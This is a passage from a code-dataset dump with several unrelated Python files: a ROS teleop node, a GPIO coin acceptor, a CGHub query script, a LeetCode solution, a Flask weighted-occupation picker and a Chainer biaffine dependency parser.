math.atan2(msg.axes[0], msg.axes[1])\n velocity.angular.z = angle\n \n #publish the velocity\n self.mob_publisher_.publish(velocity)\n \n #publish the drum velocity\n drum_vel = Float32()\n drum_vel.data = float(msg.axes[4])\n self.drum_publisher_.publish(drum_vel)\n\n\t#publish the arm velocity\n arm_vel = Float32()\n arm_vel.data = float(msg.buttons[1]) - float(msg.buttons[0])\n self.arm_publisher_.publish(arm_vel)\n\n\n\n\n # Save the msg for comparison latter\n self.last_joy_input = msg\n \n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n teleop_node = TeleopNode()\n\n rclpy.spin(teleop_node)\n\n minimal_publisher.destroy_node()\n rclpy.shutdown()\n","sub_path":"build/teleop_node/build/lib/teleop_node/teleop.py","file_name":"teleop.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"336274641","text":"import time\nimport threading\nimport RPi.GPIO as GPIO\n\n\ndef current_milli_time(): return int(round(time.time() * 1000))\n\n\nEND_COIN_DELTA = 1500\n\nPULSE_PIN = 3\nCOUNTER_PIN = 2\n\n\nclass MuntstukAcceptor():\n def __init__(self):\n self.GPIO_setup()\n self.pulse_counter = 0\n self.last_pulse_time = 0\n self.has_pulsed = False\n self.start()\n\n def GPIO_setup(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(PULSE_PIN, GPIO.IN)\n GPIO.setup(COUNTER_PIN, GPIO.IN)\n\n def incr_pulse(self, pin):\n self.pulse_counter += 1\n print(\"Aantal pulses: \" + str(self.pulse_counter))\n self.last_pulse_time = current_milli_time()\n self.has_pulsed = True\n\n def check_end_pulse(self, pin):\n if current_milli_time() > self.last_pulse_time + END_COIN_DELTA and self.has_pulsed:\n if self.pulse_counter <= 5:\n print(\"0.50 euro\")\n elif self.pulse_counter <= 10:\n print(\"1 euro\")\n elif self.pulse_counter <= 20:\n print(\"2 euro\")\n else:\n print(\"wrong coin\")\n self.pulse_counter = 0\n self.has_pulsed = False\n\n def start(self):\n #GPIO.add_event_detect(PULSE_PIN, GPIO.FALLING, callback=self.incr_pulse, bouncetime=1)\n while True:\n # if current_milli_time() > self.last_pulse_time + END_COIN_DELTA and self.has_pulsed:\n # if self.pulse_counter <= 5:\n # print(\"0.50 euro\")\n # elif self.pulse_counter <= 10:\n # print(\"1 euro\")\n # elif self.pulse_counter <= 20:\n # print(\"2 euro\")\n # else:\n # print(\"wrong coin\")\n # self.pulse_counter = 0\n # self.has_pulsed = False\n GPIO.wait_for_edge(PULSE_PIN, GPIO.FALLING, bouncetime=1)\n print(\"fell\")\n self.incr_pulse(PULSE_PIN)\n GPIO.wait_for_edge(PULSE_PIN, GPIO.RISING, bouncetime=1)\n print(\"rose\")\n #\n # vorige_status = 0\n # while True:\n # status = GPIO.input(PULSE_PIN)\n # print(status)\n # if self.has_pulsed:\n # if current_milli_time() > self.last_pulse_time + END_COIN_DELTA:\n # if self.pulse_counter <= 5:\n # print(\"0.50 euro\")\n # elif self.pulse_counter <= 10:\n # print(\"1 euro\")\n # elif self.pulse_counter <= 20:\n # print(\"2 euro\")\n # else:\n # print(\"wrong coin\")\n # self.pulse_counter = 0\n # self.has_pulsed = False\n # if vorige_status == 1 and status == 0:\n # self.pulse_counter += 1\n # print(\"Aantal pulses: \" + str(self.pulse_counter))\n # self.last_pulse_time = current_milli_time()\n # self.has_pulsed = True\n # vorige_status = 0\n # elif vorige_status == 0 and status == 1:\n # vorige_status == 1\n\n\nGPIO.cleanup()\n\n","sub_path":"Code/Backend/helpers/munstuktest.py","file_name":"munstuktest.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"352057191","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) Qotto, 2019\n\nfrom datetime import datetime, timezone\n\nfrom typing import Dict, Any\n\nfrom tonga.models.records.event import BaseEvent\n\n__all__ = [\n 'CoffeeFinished'\n]\n\n\nclass CoffeeFinished(BaseEvent):\n uuid: str\n served_to: str\n coffee_time: int\n\n def __init__(self, uuid: str, coffee_time: int, coffee_for: str, **kwargs) -> None:\n super().__init__(**kwargs)\n self.uuid = uuid\n self.coffee_time = coffee_time\n self.coffee_for = coffee_for\n\n def to_dict(self) -> Dict[str, Any]:\n r_dict = self.base_dict()\n r_dict['uuid'] = self.uuid\n r_dict['coffee_for'] = self.coffee_for\n r_dict['coffee_time'] = self.coffee_time\n return r_dict\n\n @classmethod\n def from_dict(cls, dict_data: Dict[str, Any]):\n return cls(schema_version=dict_data['schema_version'],\n record_id=dict_data['record_id'],\n partition_key=dict_data['partition_key'],\n date=datetime.fromtimestamp(dict_data['timestamp'] / 1000, timezone.utc),\n correlation_id=dict_data['correlation_id'],\n context=dict_data['context'],\n uuid=dict_data['uuid'],\n coffee_for=dict_data['coffee_for'],\n coffee_time=dict_data['coffee_time'])\n\n @classmethod\n def event_name(cls) -> str:\n return 'tonga.bartender.event.CoffeeFinished'\n","sub_path":"examples/coffee_bar/waiter/models/events/coffee_finished.py","file_name":"coffee_finished.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"174710571","text":"#!/usr/bin/env python2.7\n\"\"\"\nCGquery handler\n\ngiven arguments, creates a pickled dictionary mapping TCGA analysis IDs to full cghub bam slicer\nquery strings. These strings are used in a cghub bam slicer query to extract regions from the bam\nthey represent.\n\"\"\"\n\nimport argparse\nimport urllib2\nimport itertools\nimport xml.etree.cElementTree as ET\nimport cPickle as pickle\n\n# this hard-coded list stores which assemblies use '1' instead of 'chr1'\n# because people suck\nnon_chr_names = ['GRCh37-lite', 'GRCh37']\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--genomes\", \"-g\", nargs=\"+\", required=True,\n help=\"Genomes to send to cgquery.\")\n parser.add_argument(\"--tissue_types\", \"-u\", nargs=\"+\", required=True,\n help=\"Tissue types to look at.\")\n parser.add_argument(\"--size\", nargs=2, default=[\"120000000000\",\"*\"],\n help=\"two integer values representing # of bytes we want to look at. Second value can be *\")\n parser.add_argument(\"--study\", default=\"phs000178\",\n help=\"Study to look at. default=phs000178.\")\n parser.add_argument(\"--library_strategy\", default=\"WGS\",\n help=\"library type. default=WGS\")\n parser.add_argument(\"--target_range\", \"-t\", nargs=\"+\", default=[\"chr1:120392936-120744537\",\n \"chr1:145117638-145295356\",\n \"chr11:93677347-93678520\"],\n help=\"target range(s) of assembly. include the word chr.\")\n parser.add_argument(\"--out\", \"-o\", default=\"data/queries.pickle\", type=argparse.FileType(\"wb\"),\n help=\"Location to write out the pickled queries to. Default = queries/queries.pickle\")\n parser.add_argument(\"--debug_cutoff\", type=int)\n return parser.parse_args()\n\n\ndef search_metadata(genomes, tissue_types, size, study, library_strategy):\n \"\"\"\n given arguments to program, query cghub for all xmls.\n returns a list of xmls representing each combination of queries.\n \"\"\"\n size = '[' + \"%20TO%20\".join(size) + ']'\n xml_list = []\n base_path = \"https://cghub.ucsc.edu/cghub/metadata/analysisDetail?\"\n for genome, tissue in itertools.product(genomes, tissue_types):\n search = [\"=\".join([x, y]) for x, y in zip([\"study\", \"sample_type\", \"library_strategy\",\n \"refassem_short_name\", \"filesize\"], [study, tissue, library_strategy, genome, size])]\n url = base_path + \"&\".join(search)\n xml_list.append(ET.parse(urllib2.urlopen(url)).getroot())\n # return a flat list of xml elements\n return [item for sublist in xml_list for item in sublist]\n\n\ndef parse_metadata_xml(xml_list):\n \"\"\"\n Parses a metadata xml retrieved from cgquery.\n \"\"\"\n analysis_dict = {}\n for item in xml_list:\n if item.find('analysis_id') is not None and item.find('state').text != 'suppressed':\n analysis = item.find('analysis_id').text\n refassem_short_name = item.find('refassem_short_name').text\n analysis_dict[analysis] = refassem_short_name\n return analysis_dict\n\n\ndef build_bamslicer_query(analysis, refassem_short_name, ranges):\n \"\"\"\n Builds a query string for the CGhub bam slicer.\n \"\"\"\n if refassem_short_name in non_chr_names:\n ranges = [x.replace(\"chr\",\"\") for x in ranges]\n formatted_ranges = \"\".join([\"&range=\", \"&range=\".join(ranges)])\n base_path = \"https://slicer.cghub.ucsc.edu/analyses/{}/slices?ref={}&format=bam\".format(analysis,\n refassem_short_name)\n query_string = \"\".join([base_path, formatted_ranges])\n return query_string\n\n\ndef main():\n args = parse_args()\n xml_list = search_metadata(args.genomes, args.tissue_types, args.size, args.study, args.library_strategy)\n analysis_dict = parse_metadata_xml(xml_list)\n\n query_dict = {}\n for analysis, refassem_short_name in analysis_dict.iteritems():\n query_string = build_bamslicer_query(analysis, refassem_short_name, args.target_range)\n query_dict[analysis] = query_string\n\n if args.debug_cutoff is None:\n pickle.dump(query_dict, args.out)\n print (\"Dumped {} records for analysis.\".format(len(query_dict)))\n else:\n t = dict(query_dict.items()[:args.debug_cutoff])\n pickle.dump(t, args.out)\n print (\"Dumped {} records for analysis.\".format(len(t)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/cgqueryHandler.py","file_name":"cgqueryHandler.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"131747954","text":"'''\n107. Binary Tree Level Order Traversal II\nEasy\n\nGiven a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\nFor example:\nGiven binary tree [3,9,20,null,null,15,7],\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nreturn its bottom-up level order traversal as:\n[\n [15,7],\n [9,20],\n [3]\n]\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result = []\n if root is None:\n return result\n\n from collections import deque\n queue = deque()\n queue.append(root)\n\n while len(queue) > 0:\n previousLevelCount = len(queue)\n current = []\n for i in range(previousLevelCount):\n ele = queue.popleft()\n current.append(ele.val)\n if ele.left:\n queue.append(ele.left)\n if ele.right:\n queue.append(ele.right)\n result.append(current)\n\n return result[::-1]\n","sub_path":"tree/binary_tree_level_order_traversal_ii.py","file_name":"binary_tree_level_order_traversal_ii.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67267574","text":"from oo_step_by_step.step1.person import Person\n\n\nclass Teacher(Person):\n\n def __init__(self, name, age, klass) -> None:\n super().__init__(name, age)\n self.klass = klass\n\n def introduce(self):\n result = super().introduce() + \" I am a Teacher.\"\n if self.klass != None:\n result += \" I teach {self.klass}.\".format(self=self)\n else:\n result += \" I teach No Class.\"\n return result\n\n","sub_path":"oo_step_by_step/step2/teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"260877494","text":"# Goofy Goobers: Julia Nelson, Oscar Wang, Owen Yaggy\n# SoftDev\n# K10: Putting Little Pieces Together\n# 2021-10-05\n\nfrom flask import Flask\nimport random\nimport csv\napp = Flask(__name__) #create instance of class Flask\n\ndef openCSV(fname):\n # creates an empty dictionary and sets the temp_total and total to 0\n dict = {}\n temp_total = 0\n total = 0\n with open(fname) as f:\n # ensures that the column headers are not included in the dictionary \n f.readline()\n reader = csv.reader(f, delimiter=',')\n for row in reader:\n # separately saves the total of the probabilities for each occupation\n if 'Total' in row:\n total = float(row[1])\n else:\n # populates dictionary 'dict' with (key: value) pairs that represent\n # occupations and their probabilities\n dict[row[0]] = float(row[1])\n # keeps track of consecutive sum of the values\n temp_total += float(row[1])\n # if a total is not given, sets it to the sum of the value\n if total == 0:\n total = temp_total\n return dict, total\n\n# picks an occupation based on the weighted percentages\ndef picker():\n jobDict, total = openCSV('occupations.csv')\n # we multiply the total by 10 for random.randint() to produce an int to \n # simulate randomly selecting an occupation\n total = total * 10\n # stores a list of occupations and their corresponding probabilities in \n # two separate lists\n nums = list(jobDict.values())\n occ = list(jobDict.keys())\n conDict = {}\n sum = 0\n # populates conDict such that each (key: value) pair represents the occupation\n # and 10 times the sum of the probabilities preceding that occupation\n for i in range(len(nums)):\n nums[i] *= 10.0\n sum += nums[i]\n nums[i] = sum\n for i in range(len(occ)):\n conDict[occ[i]] = nums[i]\n\n # picks a random int from 0 inclusive to the total exclusive so that the number of\n # integers picked equals the possibility for probabilities\n n = random.randint(0, total-1)\n # returns the occupation if its probability is within range of the consecutive sum\n for i in conDict:\n if (n < conDict[i]):\n return i\n\n# runs n trials to determine if the probability of the resulting occupations matches \n# those listed in the .csv file\ndef test_probs(n):\n testResults, total = openCSV('occupations.csv')\n for i in testResults:\n testResults[i] = 0\n for i in range(n):\n testResults[picker()] += 1\n for i in testResults:\n testResults[i] = [testResults[i], round(testResults[i] / n * 10000) / 100]\n print(testResults)\n\n#returns an HTML list of the occupations\ndef getList():\n testResults, total = openCSV('occupations.csv')\n HTMLList = '''\n
      \n '''\n occupations = testResults.keys()\n for i in occupations:\n HTMLList += f\"
    • {i}
    • \\n\"\n HTMLList += \"
    \"\n return HTMLList\n\n\n@app.route(\"/\") #assign fxn to route\ndef display(): #code to display the HTML on the webpage\n output = f'''\n \n

    Goofy Goobers: Julia Nelson, Oscar Wang, Owen Yaggy

    \n

    SoftDev

    \n

    K10: Putting Little Pieces Together

    \n

    2021-10-05

    \n \n \n Your randomized output: {picker()} {getList()}\n \n '''\n return output\n\napp.debug = True\napp.run()","sub_path":"10_flask/occupy_flask_st/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220745687","text":"# normal function\ndef func(names, reverse_str = False):\n \n if reverse_str:\n names = [name[::-1] for name in names]\n names = [name.capitalize() for name in names]\n return names\n\n# kwargs function\ndef func_kwargs(names, **kwargs):\n\n if kwargs.get('reverse_str') == True:\n names = [name[::-1] for name in names]\n names = [name.capitalize() for name in names]\n return names\n\n\n\n\nnames = ['imad', 'alex'] \n\nprint(func(names))\nprint(func(names, reverse_str = True))\n\nprint(func_kwargs(names))\nprint(func_kwargs(names, reverse_str = True))","sub_path":"detailed-exercises/77-exercise.py","file_name":"77-exercise.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"354014663","text":"import chainer\nimport chainer.functions as F\nimport chainer_nn.functions as nn_F\nimport chainer_nn.links as nn_L\nimport numpy as np\n\nfrom common import mst\n\n\n\"\"\"\nNOTE: Weight Initialization comparison\n - A. This Implementation\n - URL: https://github.com/chantera/biaffineparser\n - Framework: Chainer (v5.2)\n - Initialization:\n - Embeddings (word): zero + pretrained (normalized with std)\n - Embeddings (postag): random_normal\n - BiLSTMs: `chainer.links.NStepBiLSTM` default\n (W: N(0,sqrt(1/w_in)), b: zero)\n - MLPs: W: N(0,sqrt(1/w_out)), b: zero\n - Biaffines: zero\n - B. Original\n - URL: https://github.com/tdozat/Parser-v1\n \n - Framework: TensorFlow ( (v0.5.0)\n - Path: scripts/parsing/\n - See also: https://github.com/jcyk/Dynet-Biaffine-dependency-parser\n - Framework: MXNet (>=v1.3.0)\n - Initialization:\n - Embeddings (word): zero + pretrained (normalized with std)\n - Embeddings (postag): random_normal\n - BiLSTMs: W: orthonormal_initializer, b: zero (forget gate bias: -1.0)\n - MLPs: W: orthonormal_initializer, b: zero\n - Biaffines: zero\n - D. StanfordNLP\n - URL: https://github.com/stanfordnlp/stanfordnlp\n (v0.1.0)\n - Path: stanfordnlp/models/depparse/\n - Note: This is the implementation of the following paper:\n [http://aclweb.org/anthology/K18-2016]\n - Framework: PyTorch (v1.0)\n - Initialization: *They also used additional embeddings.\n - Embeddings (word): `torch.nn.Embeddings` default (N(0,1)) + pretrained\n - Embeddings (postag): `torch.nn.Embeddings` default\n - BiLSTMs: `torch.nn.LSTM` default\n (uniform(-s,s) for both W and b where s=sqrt(1/hidden_size))\n - MLPs: `torch.nn.Linear` default\n (uniform(-s,s) for both W and b where s=sqrt(1/fan_in))\n - Biaffines: zero\n - E. NeuroNLP2\n - URL: https://github.com/XuezheMax/NeuroNLP2\n \n - Note: This is the implementation of the following paper:\n [http://www.aclweb.org/anthology/P18-1130]\n - Framework: PyTorch (v0.3)\n - Initialization: *They also used character embeddings.\n - Embeddings (word): pretrained only (no use of trainable embeddings)\n - Embeddings (postag): uniform(-s,s) where s=sqrt(3/dim)\n - BiLSTMs: W: uniform(-s,s) for where s=sqrt(1/hidden_size), b: zero\n - MLPs: `torch.nn.Linear` default\n - Biffines: U,W1,W2: xavier_uniform, b: zero\n - F. AllenNLP\n - URL: https://github.com/allenai/allennlp\n (v0.8.1)\n - Path: allennlp/models/biaffine_dependency_parser.py\n - Framework: PyTorch (v1.0 or v0.4.1)\n - Initialization: The configurations is not available.\n\"\"\"\n\n\nclass BiaffineParser(chainer.Chain):\n\n def __init__(self, n_rels, encoder,\n arc_mlp_units=500, rel_mlp_units=100,\n arc_mlp_dropout=0.0, rel_mlp_dropout=0.0):\n super().__init__()\n if isinstance(arc_mlp_units, int):\n arc_mlp_units = [arc_mlp_units]\n if isinstance(rel_mlp_units, int):\n rel_mlp_units = [rel_mlp_units]\n with self.init_scope():\n def mlp_activate(x):\n # return F.maximum(0.1 * x, x) # original\n return F.leaky_relu(x, slope=0.1)\n self.encoder = encoder\n h_dim = self.encoder.out_size\n init_mlp = chainer.initializers.HeNormal(\n scale=np.sqrt(0.5), fan_option='fan_out')\n self.mlp_arc_head = nn_L.MLP([nn_L.MLP.Layer(\n arc_mlp_units[i - 1] if i > 0 else h_dim, u, mlp_activate,\n arc_mlp_dropout, initialW=init_mlp,\n initial_bias=0.) for i, u in enumerate(arc_mlp_units)])\n self.mlp_arc_dep = self.mlp_arc_head.copy(mode='init')\n self.mlp_rel_head = nn_L.MLP([nn_L.MLP.Layer(\n rel_mlp_units[i - 1] if i > 0 else h_dim, u, mlp_activate,\n rel_mlp_dropout, initialW=init_mlp,\n initial_bias=0.) for i, u in enumerate(rel_mlp_units)])\n self.mlp_rel_dep = self.mlp_rel_head.copy(mode='init')\n init_biaf = chainer.initializers.Zero()\n self.biaf_arc = nn_L.Biaffine(\n arc_mlp_units[-1], arc_mlp_units[-1], 1,\n nobias=(False, True, True),\n initialW=init_biaf, initial_bias=0.)\n self.biaf_rel = nn_L.Biaffine(\n rel_mlp_units[-1], rel_mlp_units[-1], n_rels,\n nobias=(False, False, False),\n initialW=init_biaf, initial_bias=0.)\n self._results = {}\n\n def forward(self, words, pretrained_words, postags, *args):\n self._results.clear()\n # [n; B], [n; B], [n; B] => (B, n_max, d)\n hs = self.encode(words, pretrained_words, postags)\n hs_arc_h = self.mlp_arc_head(hs, n_batch_axes=2)\n hs_arc_d = self.mlp_arc_dep(hs, n_batch_axes=2)\n hs_rel_h = self.mlp_rel_head(hs, n_batch_axes=2)\n hs_rel_d = self.mlp_rel_dep(hs, n_batch_axes=2)\n logits_arc = F.squeeze(self.biaf_arc(hs_arc_d, hs_arc_h), axis=3)\n self._mask = self.xp.asarray(_mask_arc(\n logits_arc, self._lengths, mask_loop=not chainer.config.train))\n self._logits_arc = logits_arc + (1. - self._mask) * -1e8\n self._logits_rel = self.biaf_rel(hs_rel_d, hs_rel_h)\n # => (B, n_max, n_max), (B, n_max, n_max, n_rels)\n return self._logits_arc, self._logits_rel\n\n def encode(self, *args):\n self._hs, self._lengths = self.encoder(*args[:3])\n return self._hs\n\n def parse(self, words, pretrained_words, postags, use_cache=True):\n with chainer.no_backprop_mode():\n if len(self._results) == 0 or not use_cache:\n self.forward(words, pretrained_words, postags)\n arcs = _parse_by_graph(self._logits_arc, self._lengths, self._mask)\n rels = _decode_rels(self._logits_rel, arcs, self._lengths)\n arcs = [arcs_i[:n] for arcs_i, n in zip(arcs, self._lengths)]\n rels = [rels_i[:n] for rels_i, n in zip(rels, self._lengths)]\n parsed = list(zip(arcs, rels))\n return parsed\n\n def compute_loss(self, y, t):\n self._results = _compute_metrics(y, t, self._lengths, False)\n return self._results['arc_loss'] + self._results['rel_loss']\n\n def compute_accuracy(self, y, t, use_cache=True):\n arc_accuracy = self._results.get('arc_accuracy', None)\n rel_accuracy = self._results.get('rel_accuracy', None)\n if not use_cache or (arc_accuracy is None and rel_accuracy is None):\n results = _compute_metrics(y, t, self._lengths, False)\n arc_accuracy = results.get('arc_accuracy', None)\n rel_accuracy = results.get('rel_accuracy', None)\n self._results.update({\n 'arc_accuracy': arc_accuracy,\n 'rel_accuracy': rel_accuracy,\n })\n return arc_accuracy, rel_accuracy\n\n\ndef _mask_arc(logits_arc, lengths, mask_loop=True):\n mask = np.zeros(logits_arc.shape, dtype=np.float32)\n for i, length in enumerate(lengths):\n mask[i, :length, :length] = 1.\n if mask_loop:\n mask *= (1. - np.eye(logits_arc.shape[2], dtype=np.float32))\n return mask\n\n\ndef _parse_by_graph(logits_arc, lengths, mask=None):\n probs = F.softmax(logits_arc, axis=2).data\n if mask is not None:\n probs *= mask\n probs = chainer.cuda.to_cpu(probs)\n trees = np.full((len(lengths), max(lengths)), -1, dtype=np.int32)\n for i, (probs_i, length) in enumerate(zip(probs, lengths)):\n trees[i, 1:length] = mst.mst(probs_i[:length, :length])[0][1:]\n return trees\n\n\ndef _decode_rels(logits_rel, trees, lengths, root=0):\n steps = np.arange(trees.shape[1])\n logits_rel = [logits_rel[i, steps, arcs] for i, arcs in enumerate(trees)]\n logits_rel = F.stack(logits_rel, axis=0).data\n logits_rel[:, :, root] = -1e8\n rels = logits_rel.argmax(axis=2)\n rels = chainer.cuda.to_cpu(rels)\n for rels_i, arcs_i in zip(rels, trees):\n rels_i[:] = np.where(arcs_i == 0, root, rels_i)\n rels[:, 0] = -1\n return rels\n\n\ndef _compute_metrics(parsed, gold_batch, lengths,\n use_predicted_arcs_for_rels=True):\n logits_arc, logits_rel, *_ = parsed\n true_arcs, true_rels, *_ = zip(*gold_batch)\n\n # exclude attachment from the root\n logits_arc, logits_rel = logits_arc[:, 1:], logits_rel[:, 1:]\n true_arcs = F.pad_sequence(true_arcs, padding=-1)[:, 1:]\n true_rels = F.pad_sequence(true_rels, padding=-1)[:, 1:]\n lengths = np.array(lengths, dtype=np.int32) - 1\n xp = chainer.cuda.get_array_module(logits_arc)\n if xp is not np:\n true_arcs.to_gpu()\n true_rels.to_gpu()\n\n b, n_deps, n_heads = logits_arc.shape\n logits_arc_flatten = F.reshape(logits_arc, (b * n_deps, n_heads))\n true_arcs_flatten = F.reshape(true_arcs, (b * n_deps,))\n arc_loss = F.softmax_cross_entropy(\n logits_arc_flatten, true_arcs_flatten, ignore_label=-1)\n arc_accuracy = _accuracy(\n logits_arc_flatten, true_arcs_flatten, ignore_label=-1)\n\n if use_predicted_arcs_for_rels:\n parsed_arcs = xp.argmax(logits_arc.data, axis=2)\n else:\n parsed_arcs = true_arcs.data\n parsed_arcs = chainer.cuda.to_cpu(parsed_arcs)\n b, n_deps, n_heads, n_rels = logits_rel.shape\n base1, base2 = n_deps * n_heads, np.arange(n_deps) * n_heads\n parsed_arcs_flatten = np.concatenate(\n [base1 * i + base2 + arcs for i, arcs in enumerate(parsed_arcs)])\n logits_rel_flatten = F.embed_id(\n xp.asarray(parsed_arcs_flatten),\n F.reshape(logits_rel, (b * base1, n_rels)))\n true_rels_flatten = F.reshape(true_rels, (b * n_deps,))\n rel_loss = F.softmax_cross_entropy(\n logits_rel_flatten, true_rels_flatten, ignore_label=-1)\n rel_accuracy = _accuracy(\n logits_rel_flatten, true_rels_flatten, ignore_label=-1)\n\n return {'arc_loss': arc_loss, 'arc_accuracy': arc_accuracy,\n 'rel_loss': rel_loss, 'rel_accuracy': rel_accuracy}\n\n\ndef _accuracy(y, t, ignore_label=None):\n if isinstance(y, chainer.Variable):\n y = y.data\n if isinstance(t, chainer.Variable):\n t = t.data\n xp = chainer.cuda.get_array_module(y)\n pred = y.argmax(axis=1).reshape(t.shape)\n if ignore_label is not None:\n mask = (t == ignore_label)\n ignore_cnt = mask.sum()\n pred = xp.where(mask, ignore_label, pred)\n count = (pred == t).sum() - ignore_cnt\n total = t.size - ignore_cnt\n else:\n count = (pred == t).sum()\n total = t.size\n return count, total\n\n\nclass Encoder(chainer.Chain):\n\n def __init__(self,\n word_embeddings,\n pretrained_word_embeddings=None,\n postag_embeddings=None,\n n_lstm_layers=3,\n lstm_hidden_size=None,\n embeddings_dropout=0.0,\n lstm_dropout=0.0,\n recurrent_dropout=0.0):\n super().__init__()\n with self.init_scope():\n self._use_pretrained_word = self._use_postag = False\n embeddings = [(word_embeddings, False)] # (weights, fixed)\n lstm_in_size = word_embeddings.shape[1]\n if pretrained_word_embeddings is not None:\n embeddings.append((pretrained_word_embeddings, True))\n self._use_pretrained_word = True\n if postag_embeddings is not None:\n embeddings.append((postag_embeddings, False))\n lstm_in_size += postag_embeddings.shape[1]\n self._use_postag = True\n embed_list = []\n for weights, fixed in embeddings:\n s = weights.shape\n embed_list.append(\n nn_L.EmbedID(s[0], s[1], weights, None, fixed))\n self.embeds = nn_L.EmbedList(\n embed_list, dropout=0.0, merge=False, split=False)\n if lstm_hidden_size is None:\n lstm_hidden_size = lstm_in_size\n # NOTE(chantera): The original implementation uses BiLSTM\n # with variational dropout for inputs and hidden states.\n # The same dropout is applied by the following code:\n # ---\n # self.bilstm = nn.NStepBiLSTM(\n # n_lstm_layers, lstm_in_size, lstm_hidden_size, lstm_dropout,\n # recurrent_dropout, use_variational_dropout=True)\n self.bilstm = nn_L.NStepBiLSTM(\n n_lstm_layers, lstm_in_size, lstm_hidden_size, lstm_dropout,\n recurrent_dropout, use_variational_dropout=False)\n self.embeddings_dropout = embeddings_dropout\n self.lstm_dropout = lstm_dropout\n self._hidden_size = lstm_hidden_size\n\n def forward(self, *xs):\n # [(n, d_word); B], [(n, d_word); B], [(n, d_pos); B]\n lengths = np.array([x.size for x in xs[0]], np.int32)\n rs, boundaries = self.embeds(*xs)\n rs = self._concat_embeds(rs, self.embeddings_dropout)\n # => [(n, d_word + d_pos); B]\n if np.all(lengths == lengths[0]):\n boundaries = len(lengths)\n rs = F.split_axis(\n nn_F.dropout(rs, self.lstm_dropout), boundaries, axis=0)\n hs = self.bilstm(hx=None, cx=None, xs=rs)[-1]\n hs = nn_F.dropout(F.pad_sequence(hs), self.lstm_dropout)\n return hs, lengths\n\n def _concat_embeds(self, embed_outputs, dropout=0.0):\n rs_postags = embed_outputs.pop() if self._use_postag else None\n rs_words_pretrained = embed_outputs.pop() \\\n if self._use_pretrained_word else None\n rs_words = embed_outputs.pop()\n if rs_words_pretrained is not None:\n rs_words += rs_words_pretrained\n rs = [rs_words]\n if rs_postags is not None:\n rs.append(rs_postags)\n # NOTE(chantera): The original implementation uses\n # embeddings dropout as below.\n # ---\n # rs = _embed_dropout_v1(\n # rs[0], rs[1] if len(rs) > 1 else None, dropout)\n rs = _embed_dropout_v2(rs, dropout)\n if len(rs) > 1:\n rs = F.concat(rs)\n else:\n rs = rs[0]\n return rs\n\n @property\n def out_size(self):\n return self._hidden_size * 2\n\n\ndef _embed_dropout_v1(rs_words, rs_postags=None,\n word_dropout=0.0, postag_dropout=0.0):\n \"\"\"\n Drop words and tags with scaling to compensate the dropped one.\n https://github.com/tdozat/Parser-v1/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/models/nn.py#L58 # NOQA\n \"\"\"\n if not chainer.config.train:\n return rs_words, rs_postags\n xp = chainer.cuda.get_array_module(rs_words)\n mask_shape = (rs_words.shape[0], 1)\n word_mask = xp.float32(1. - word_dropout) \\\n * (xp.random.rand(*mask_shape) >= word_dropout)\n if rs_postags is not None:\n postag_mask = xp.float32(1. - postag_dropout) \\\n * (xp.random.rand(*mask_shape) >= postag_dropout)\n word_embed_size = rs_words.shape[-1]\n postag_embed_size = rs_postags.shape[-1]\n embed_size = word_embed_size + postag_embed_size\n dropped_sizes = word_mask * word_embed_size \\\n + postag_mask * postag_embed_size\n if word_embed_size == postag_embed_size:\n embed_size += word_embed_size\n dropped_sizes += word_mask * postag_mask * word_embed_size\n scale = embed_size / (dropped_sizes + 1e-12)\n word_mask *= scale\n postag_mask *= scale\n ys_words = rs_words * word_mask\n if rs_postags is not None:\n ys_postags = rs_postags * postag_mask\n else:\n ys_postags = None\n return ys_words, ys_postags\n\n\ndef _embed_dropout_v2(xs, dropout=0.0):\n \"\"\"\n Drop representations with scaling.\n https://github.com/tdozat/Parser-v2/blob/304c638aa780a5591648ef27060cfa7e4bee2bd0/parser/neural/models/nn.py#L50 # NOQA\n \"\"\"\n if not chainer.config.train or dropout == 0.0:\n return xs\n xp = chainer.cuda.get_array_module(xs[0])\n masks = (xp.random.rand(len(xs), xs[0].shape[0]) >= dropout) \\\n .astype(xp.float32)\n scale = len(masks) / xp.maximum(xp.sum(masks, axis=0, keepdims=True), 1)\n masks = xp.expand_dims(masks * scale, axis=2)\n ys = [xs_each * mask for xs_each, mask in zip(xs, masks)]\n return ys\n","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"86713269","text":"#!/usr/bin/env python3\n\n# --- Part Two ---\n\n# As a stress test on the system, the programs here clear the grid and then store the value 1 in square 1. Then, in the same allocation order as shown above, they store the sum of the values in all adjacent squares, including diagonals.\n\n# So, the first few squares' values are chosen as follows:\n\n# Square 1 